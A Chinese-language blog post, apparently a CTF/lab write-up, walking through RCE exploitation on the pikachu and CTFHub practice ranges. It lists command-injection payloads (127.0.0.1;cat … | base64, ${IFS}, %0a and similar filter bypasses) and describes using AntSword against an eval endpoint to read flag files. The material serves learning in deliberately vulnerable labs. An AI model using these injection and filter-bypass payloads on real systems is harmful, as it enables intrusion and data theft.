• RCE远程控制漏洞(下)


    目录

    pikachu靶场基本认识

    ctfhub靶场


    上面一篇文章我们给出了一些关于RCE漏洞的基础知识,这篇文章我们通过靶场来进行更深一步的了解:

    在靶场中我们可以通过命令的拼接来进行一系列的操作

    pikachu靶场基本认识


    比如:以pikachu靶场来进行实验:

    1. 127.0.0.1 & ipconfig(Mac系统中是ifconfig)
    2. 127.0.0.1 & whoami
    3. phpinfo();(eval()函数)

    这是单纯ping 127.0.0.1的是时候

    输入phpinfo(); :

    由此可见我们可以通过远程命令来获得很多程序的信息甚至是进行控制。

    ctfhub靶场

    pikachu这个靶场相对比较简单,接下来我们通过ctfhub来进行一些漏洞的利用:

    拿CTFHUB中的eval的题目来进行一个演示:

    我们看见这边有eval的函数,那么这边这里就是一个可以利用的漏洞,我们将网址复制到中国蚁剑上,这个程序的安装我们可以去百度一下,然后通过github安装。这边的密码我们通过php的代码可以看见。

     这里我们看见只有这一个php文件,我们就通过右击将其通过cmd打开:

    然后从中我们发现了flag文件的位置,就可以通过cat来显示文件内容并进行提交。 

    RCE的漏洞关于eval的大致都是这样利用,然后我们需要通过不同的要求来进行不同方式的利用

    然后对于文件包含和命令注入的题目则是和pikachu的靶场一样,我们通过几个命令拼接就可以了:可能有以下几种流程:

    1. 命令注入
    2. 1、代码审计
    3. 2、payload 127.0.0.1;ls 寻找到flag地址
    4. 3 payload 127.0.0.1;cat 308563028813712.php | base64
    5. 4 base64解密得到flag

    如果不允许使用cat命令: 

    1. payload 127.0.0.1;
    2. ls payload 127.0.0.1;
    3. less 308563028813712.php | base64 base64
    4. 解密得到flag
    5. 其他命令 cat 由第一行开始显示内容,并将所有内容输出
    6. tac 从最后一行倒序显示内容,并将所有内容输出
    7. more 根据窗口大小,一页一页的现实文件内容
    8. less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符
    9. head 只显示头几行
    10. tail 只显示最后几行
    11. nl 类似于cat -n,显示时输出行号
    12. tailf 类似于tail -f
    1. 过滤空格
    2. payload 127.0.0.1;ls
    3. payload 127.0.0.1;cat${IFS}flag_2559114064936.php
    4. 右键查看源码得到flag
    5. 其他使用IFS$9、%09、<、>、<>、{,}、%20、${ IFS}${IFS}来代替空格
    1. 过滤目录分隔符
    2. payload 127.0.0.1;ls
    3. payload 127.0.0.1&ls flag_is_here
    4. payload 127.0.0.1&cd flag_is_here;cat flag_ 133752248118633.php
    5. 使用;或者%0a代替目录分隔符/
    1. 过滤运算符
    2. payload 127.0.0.1;ls
    3. payload 127.0.0.1;
    4. base64 flag_3969293319629.php
    5. base64解密得到flag

  • 相关阅读:
    每日刷题记录 (三)
    计算机毕业设计Java校园新闻网站(系统+源码+mysql数据库+lw文档)
    由浅到深-模拟实现list
    GAIA1-自动驾驶各场景数据生成
    牛客周赛 Round 15
    VUE前端工程化-3
    MongoDB、Elasticsearch
    MySQL 计算年龄
    你想对构造函数说些什么?
    小程序 input type=‘number‘ 不能输入小数点??
  • 原文地址:https://blog.csdn.net/hmysn/article/details/125423215